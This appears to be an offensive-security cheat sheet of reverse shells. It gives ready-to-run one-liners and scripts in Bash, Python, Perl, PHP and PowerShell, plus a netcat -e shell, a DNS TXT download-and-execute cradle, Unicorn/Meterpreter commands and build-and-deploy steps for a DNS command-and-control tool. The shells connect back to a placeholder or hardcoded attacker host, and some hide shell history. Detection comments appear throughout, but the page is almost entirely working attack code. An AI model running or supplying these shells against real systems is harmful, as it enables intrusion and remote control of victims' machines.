Reverse Shells

# Bash reverse shell: the inner interactive bash (-i) has stdout+stderr (>&) redirected
# to bash's /dev/tcp/<LHOST>/<LPORT> pseudo-device and stdin (0>&1) tied to the same fd,
# so the connection is opened by the bash process itself with no separate network binary.
# Detection angle: a bash process whose fds 0/1/2 are all the same TCP socket.
/bin/bash -c '/bin/bash -i >& /dev/tcp/<LHOST>/<LPORT> 0>&1'
# FIFO variant: nc carries the connection and /tmp/f relays nc's output back into the
# interactive sh's stdin. The rm/mkfifo pair creates a named pipe at the fixed path /tmp/f
# that nothing here removes afterwards, so it remains on disk as a durable artifact.
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <LHOST> <LPORT> >/tmp/f

# Python reverse shell (IPv4): connect to <LHOST>:<LPORT>, dup2() the socket over fds 0/1/2,
# then run an interactive /bin/sh whose stdio is therefore that socket; s.close() only runs
# after the shell exits. Detection angle: a python process with a TCP socket on fds 0-2
# spawning /bin/sh.
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<LHOST>",<LPORT>));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);s.close()
# pty variant: same fd setup, but bash is started under a pseudo-terminal via pty.spawn.
# os.putenv("HISTFILE","/dev/null") goes into the environment the child inherits, so the
# spawned bash persists no command history — do not expect .bash_history evidence here.
import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<LHOST>",<LPORT>));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);os.putenv("HISTFILE","/dev/null");pty.spawn("/bin/bash");s.close()

# IPv6 versions of the two Python snippets above: identical fd handling, but the socket is
# AF_INET6, so <LHOST> must be an IPv6 address (or a name that resolves to one).
import socket,subprocess,os;s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.connect(("<LHOST>",<LPORT>));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);s.close()
# pty variant over IPv6; HISTFILE=/dev/null again suppresses the spawned bash's history.
import socket,os,pty;s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.connect(("<LHOST>",<LPORT>));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);os.putenv("HISTFILE","/dev/null");pty.spawn("/bin/bash");s.close()

# PowerShell reverse shell (one-liner): connects with a raw TcpClient to the hardcoded
# 10.10.13.37:1337 (the other snippets on this page use <LHOST>/<LPORT> placeholders),
# reads ASCII text from the stream, executes it with iex (Invoke-Expression), and writes
# the output back followed by a "# " prompt. The stream is plain TCP with no TLS layer,
# so commands and output are visible in cleartext on the wire.
$client = New-Object System.Net.Sockets.TCPClient("10.10.13.37",1337);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "# ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
# PowerShell reverse shell (script form, same hardcoded host/port as the one-liner above):
# reads one line per command from the TcpClient stream and dispatches it until "exit".
# Note: the script assigns to $args, PowerShell's automatic variable for unbound arguments;
# it works here but shadows that variable for the script's scope.
$socket = new-object System.Net.Sockets.TcpClient("10.10.13.37",1337);
if($socket -eq $null){exit 1}
$stream = $socket.GetStream();
$writer = new-object System.IO.StreamWriter($stream);
$buffer = new-object System.Byte[] 1024;
$encoding = new-object System.Text.AsciiEncoding;
do
{
$writer.Flush();
$read = $null;
$res = ""
# Block until at least one Read() has returned, then drain whatever else is buffered.
while($stream.DataAvailable -or $read -eq $null) {
$read = $stream.Read($buffer, 0, 1024)
}
# Decode the received bytes and strip line endings so "exit" compares exactly.
$out = $encoding.GetString($buffer, 0, $read).Replace("`r`n","").Replace("`n","");
if(!$out.equals("exit")){
$args = "";
if($out.IndexOf(' ') -gt -1){
# Split "<cmd> <rest>" at the first space: $out becomes the command, $args the rest.
$args = $out.substring($out.IndexOf(' ')+1);
$out = $out.substring(0,$out.IndexOf(' '));
# More than one argument: run via cmd.exe /c with stdout/stderr redirected; stderr is
# returned only when the exit code is non-zero, otherwise stdout.
if($args.split(' ').length -gt 1){
$pinfo = New-Object System.Diagnostics.ProcessStartInfo
$pinfo.FileName = "cmd.exe"
$pinfo.RedirectStandardError = $true
$pinfo.RedirectStandardOutput = $true
$pinfo.UseShellExecute = $false
$pinfo.Arguments = "/c $out $args"
$p = New-Object System.Diagnostics.Process
$p.StartInfo = $pinfo
$p.Start() | Out-Null
$p.WaitForExit()
$stdout = $p.StandardOutput.ReadToEnd()
$stderr = $p.StandardError.ReadToEnd()
if ($p.ExitCode -ne 0) {
$res = $stderr
} else {
$res = $stdout
}
}
else{
# Exactly one argument: invoke directly with the call operator.
$res = (&"$out" "$args") | out-string;
}
}
else{
# No arguments: invoke the bare command name.
$res = (&"$out") | out-string;
}
if($res -ne $null){
$writer.WriteLine($res)
}
}
}While (!$out.equals("exit"))
$writer.close();
$socket.close();
$stream.Dispose()
#$a=New-Object System.Net.Sockets.TcpClient("10.10.13.37",1337);if($a -eq $null){exit 1}$b=$a.GetStream();$c=New-Object System.IO.StreamWriter($b);$d=New-Object System.Byte[] 1024;$e=New-Object System.Text.AsciiEncoding;do{$c.Flush();$f=$null;$g="";while($b.DataAvailable -or $f -eq $null) {$f=$b.Read($d,0,1024)}$h=$e.GetString($d,0,$f).Replace("`r`n","").Replace("`n","");if(!$h.equals("exit")){$i="";if($h.IndexOf(" ") -gt -1){$i=$h.Substring($h.IndexOf(" ")+1);$h=$h.Substring(0,$h.IndexOf(" "));if($i.Split(" ").Length -gt 1){$k=New-Object System.Diagnostics.ProcessStartInfo;$k.FileName="cmd.exe";$k.RedirectStandardError=$true;$k.RedirectStandardOutput=$true;$k.UseShellExecute=$false;$k.Arguments="/c $h $i";$p=New-Object System.Diagnostics.Process;$p.StartInfo=$k;$p.Start()|Out-Null;$p.WaitForExit();$l=$p.StandardOutput.ReadToEnd();$m=$p.StandardError.ReadToEnd();if($p.ExitCode -ne 0){$g=$m}else{$g=$l}}else{$g=(&"$h" "$i")|Out-String;}}else{$g=(&"$h")|Out-String;}if($g -ne $null){$c.WriteLine($g)}}}while(!$h.equals("exit"))$c.close();$a.close();$b.Dispose()

# PowerShell DNS delivery cradle: the TXT record (DNS type 16) of cradle.megacorp.com holds
# the next stage, which iex executes. $a (a URL on 10.10.13.37) is assigned but not used on
# this line — presumably read by the fetched stage; confirm against payload.txt.
# Detection angle: powershell.exe issuing a TXT lookup immediately before an outbound fetch.
'powershell $a=""""http://10.10.13.37/payload.txt"""";iex(Resolve-DnsName """"cradle.megacorp.com"""" 16).Strings[0]'

<?php
/* PHP wrapper: passthru() runs the bash /dev/tcp reverse shell (see the Bash entry) from
 * inside the PHP process and streams its output into the response. The shell is therefore
 * a child of whatever executes PHP (web server / php-fpm) — a process-tree relationship
 * worth alerting on. */
echo passthru("/bin/bash -c '/bin/bash -i >& /dev/tcp/<LHOST>/<LPORT> 0>&1'"); ?>

# Perl reverse shell: opens a TCP socket S to <LHOST>:<LPORT>, reopens STDIN/STDOUT/STDERR
# onto it (open(...,">&S")), then exec()s an interactive /bin/sh that inherits those fds.
# Detection angle: a perl process whose fds 0-2 are a TCP socket exec'ing /bin/sh.
use Socket;$i="<LHOST>";$p=<LPORT>;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};

$ {nc.traditional|nc|ncat|netcat} <LHOST> <LPORT> {-e|-c} /bin/bash

$ python3 unicorn.py windows/meterpreter/reverse_https 10.10.13.37 443
$ sudo msfconsole -qr unicorn.rc
PS > IEX(New-Object Net.WebClient).DownloadString('powershell_attack.txt')

$ {nc.traditional|nc|ncat|netcat} [-6] -lvnp <LPORT>

Buy a domain and configure its DNS records (e.g., c2cdomain.net):
A * -> <IP>
A @ -> <IP>
A chashell -> <IP>
NS c -> chashell.c2cdomain.net
Get dependencies:
$ export GOPATH=/home/snovvcrash/code/go
$ export PATH=$GOPATH:$GOPATH/bin:$PATH
$ go get -v -u github.com/golang/dep/cmd/dep
$ go get github.com/mitchellh/gox
$ cd $GOPATH/src/github.com/golang/dep
$ go install ./...
Clone chashell into $GOPATH/src (otherwise, dep will error out):
$ git clone https://github.com/sysdream/chashell $GOPATH/src/chashell
$ cd $GOPATH/src/chashell
Build binaries:
$ export ENCRYPTION_KEY=$(python -c 'from os import urandom; print(urandom(32).encode("hex"))')
$ export DOMAIN_NAME=c.c2cdomain.net
$ make build-all OSARCH="linux/amd64"
Run server on Attacker:
$ cd release/
$ sudo systemctl stop systemd-resolved
$ sudo ./chaserv_linux_amd64
Run client on Victim:
$ ./chashell_linux_amd64

Listen:
$ rlwrap ./xc -l -p 443
Launch:
PS > Start-Process -NoNewWindow .\xc.exe "10.10.13.38 443"